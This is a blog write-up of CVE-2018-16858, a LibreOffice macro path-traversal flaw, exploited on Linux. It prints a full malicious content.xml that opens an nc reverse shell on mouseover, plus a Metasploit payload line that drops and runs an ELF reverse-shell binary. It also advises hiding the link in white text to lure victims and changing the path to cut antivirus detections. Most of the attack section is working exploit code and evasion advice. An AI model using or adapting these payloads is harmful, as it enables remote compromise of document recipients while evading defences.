CVE 2018-16858 Write up – or the joy of macros

 

I recently read this article about the vulnerability discovered in Libre office < 6.0.7/6.1.3 and thought I would have a play around with it. As the article mentioned focused on Windows I will have a look at Linux.

A Metasploit module exists and can be found at the following link. Firstly, I will have a look at the manual exploit then move on to the Metasploit module.

Manual

The prep is the same as in the article linked above. First, open a new Libre Office document insert a hyperlink click the cog and then select python sample, table sample then create table assign this to mouse over and click apply.

step1

If you save this and then unzip the odt file you get a selection of files, the one we are interested in is called content.xml. If you scroll down to the bottom of this you can see the macro call.

step2

script:language=”ooo:script” script:event-name=”dom:mouseover” xlink:href=”vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&amp;location=share” xlink:type=”simple”/></office:event-listeners><text:span text:style-name=”T1″>http://abcd/</text:span></text:a></text:p></office:text></office:body></office:document-content&gt;

The article shows that other python scripts that come packaged with Libre office can also be accessed from this script through a file traversal vulnerability. The vulnerable one used is the oc.py which can be accessed via the file traversal vulnerability by replacing a part of the text in content.xml.

xlink:href=”vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1,<payload>)?language=Python&amp;location=share” xlink:type=”simple”

By exploiting the call to os.system one of the arguments can be replaced with a command of your choosing. Not a lot of commands work given the interface and certain characters will mean LibreOffice cannot open the file. I found that if you URL encode everything in the line it sometimes runs a lot smoother. So from here all you need to do is add in the payload save it and compress it. Replacing the ext with .odt if you don’t have the option to do it initially.

If everything worked when the document is opened all a user would need to do is mouse over the url to activate the code, likely a reverse shell. As seen below:

 

demo

For this demo I used nc -e /bin/bash 127.0.0.1 4444 this makes the content.xml file look like this:

<?xml version=”1.0″ encoding=”UTF-8″?>
<office:document-content xmlns:office=”urn:oasis:names:tc:opendocument:xmlns:office:1.0″ xmlns:style=”urn:oasis:names:tc:opendocument:xmlns:style:1.0″ xmlns:text=”urn:oasis:names:tc:opendocument:xmlns:text:1.0″ xmlns:table=”urn:oasis:names:tc:opendocument:xmlns:table:1.0″ xmlns:draw=”urn:oasis:names:tc:opendocument:xmlns:drawing:1.0″ xmlns:fo=”urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0″ xmlns:xlink=”http://www.w3.org/1999/xlink&#8221; xmlns:dc=”http://purl.org/dc/elements/1.1/&#8221; xmlns:meta=”urn:oasis:names:tc:opendocument:xmlns:meta:1.0″ xmlns:number=”urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0″ xmlns:svg=”urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0″ xmlns:chart=”urn:oasis:names:tc:opendocument:xmlns:chart:1.0″ xmlns:dr3d=”urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0″ xmlns:math=”http://www.w3.org/1998/Math/MathML&#8221; xmlns:form=”urn:oasis:names:tc:opendocument:xmlns:form:1.0″ xmlns:script=”urn:oasis:names:tc:opendocument:xmlns:script:1.0″ xmlns:ooo=”http://openoffice.org/2004/office&#8221; xmlns:ooow=”http://openoffice.org/2004/writer&#8221; xmlns:oooc=”http://openoffice.org/2004/calc&#8221; xmlns:dom=”http://www.w3.org/2001/xml-events&#8221; xmlns:xforms=”http://www.w3.org/2002/xforms&#8221; xmlns:xsd=”http://www.w3.org/2001/XMLSchema&#8221; xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance&#8221; xmlns:rpt=”http://openoffice.org/2005/report&#8221; xmlns:of=”urn:oasis:names:tc:opendocument:xmlns:of:1.2″ xmlns:xhtml=”http://www.w3.org/1999/xhtml&#8221; xmlns:grddl=”http://www.w3.org/2003/g/data-view#&#8221; xmlns:officeooo=”http://openoffice.org/2009/office&#8221; xmlns:tableooo=”http://openoffice.org/2009/table&#8221; xmlns:drawooo=”http://openoffice.org/2010/draw&#8221; xmlns:calcext=”urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0″ xmlns:loext=”urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0″ xmlns:field=”urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0″ xmlns:formx=”urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0″ xmlns:css3t=”http://www.w3.org/TR/css3-text/&#8221; office:version=”1.2″><office:scripts/><office:font-face-decls><style:font-face style:name=”Liberation Serif” svg:font-family=”&apos;Liberation Serif&apos;” style:font-family-generic=”roman” style:font-pitch=”variable”/><style:font-face style:name=”Liberation Sans” svg:font-family=”&apos;Liberation Sans&apos;” style:font-family-generic=”swiss” style:font-pitch=”variable”/><style:font-face style:name=”DejaVu Sans” svg:font-family=”&apos;DejaVu Sans&apos;” style:font-family-generic=”system” style:font-pitch=”variable”/></office:font-face-decls><office:automatic-styles><style:style style:name=”T1″ style:family=”text”><style:text-properties officeooo:rsid=”001d0da0″/></style:style></office:automatic-styles><office:body><office:text><text:sequence-decls><text:sequence-decl text:display-outline-level=”0″ text:name=”Illustration”/><text:sequence-decl text:display-outline-level=”0″ text:name=”Table”/><text:sequence-decl text:display-outline-level=”0″ text:name=”Text”/><text:sequence-decl text:display-outline-level=”0″ text:name=”Drawing”/><text:sequence-decl text:display-outline-level=”0″ text:name=”Figure”/></text:sequence-decls><text:p text:style-name=”Standard”><text:a xlink:type=”simple” xlink:href=”http://abcd/&#8221; text:style-name=”Internet_20_link” text:visited-style-name=”Visited_20_Internet_20_Link”><office:event-listeners><script:event-listener script:language=”ooo:script” script:event-name=”dom:mouseover” xlink:href=”vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, nc -e /bin/bash 127.0.0.1 4444)?language=Python&amp;location=share” xlink:type=”simple”/></office:event-listeners><text:span text:style-name=”T1″>http://abcd/</text:span></text:a></text:p></office:text></office:body></office:document-content&gt;

The hyperlink can be turned white and made a large font to increase the likelihood of the user activating it.

Metasploit

Running the metasploit module, Libre office Macro Code Execution provides an odt file with the payload already embedded. You simply need to set lhost and lport and specify the payload. In this example I used /linux/x64/shell/reverse_tcp. Once created spin up a quick multi/handler with the same details and take a look at the odt file. The odt creates an elf binary, makes it executable, executes and then deletes itself.

After attempting to open the file with Libre Office a read/write error occurs. To get round this I opened the file in notepad and url encoded the payload line resulting in:

“vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1, printf ‘\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\371\0\0\0\0\0\0\0\172\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\122\152\12\101\131\126\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\12\12\16\7\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\132\17\5\110\205\300\170\357\377\346’%3E%3E/tmp/ieSVN%20;%20chmod%20+x%20/tmp/ieSVN%20;%20/tmp/ieSVN%20;%20rm%20-f%20/tmp/ieSVN%20&&%20echo)?language=Python&amp;location=share”

This ran with no problems and on mouse over connected back to my listener. Not sure why the initial payload didn’t work or if something was wrong in the set up but it the url encoding sorted it.

Detection

The manual Libre office file hits on four antivirus on Virustotal.com. The metasploit created file hit off the same four virus scanners on VirusTotal and the elf it creates hit on 9. Adding a double slash in the content.xml reduces the AV count of the .odt to 2.

..//..//..//program/python-core-3.5.5/lib

By pasting just the payload from the metasploit module into the manual setup odt file it reduces the size of the file but not the amount of antivirus hits. The created file will need to be played with in order to reduce the count. I have not yet managed to get anything super great to work apart from those mentioned but I will keep trying stuff. Feel free to comment with any interesting payloads you go to work.

Any comments or questions hit me up on twitter 0x221b.

Advertisements

One thought on “CVE 2018-16858 Write up – or the joy of macros”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s